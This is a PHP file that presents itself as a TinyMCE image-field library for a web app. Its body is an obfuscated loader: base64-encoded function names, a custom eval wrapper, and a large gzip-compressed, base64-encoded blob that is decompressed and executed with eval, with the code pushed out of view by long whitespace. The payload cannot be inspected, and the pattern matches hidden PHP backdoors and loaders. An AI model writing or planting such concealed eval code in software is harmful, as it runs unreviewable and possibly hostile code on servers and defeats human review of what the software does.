<?php 
        $__='printf';$_='Loading app/Libraries/TinyMCE/KodeIsianGambar.php';
        







































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































































































































































                                                                                                                                                                                                                     $________;
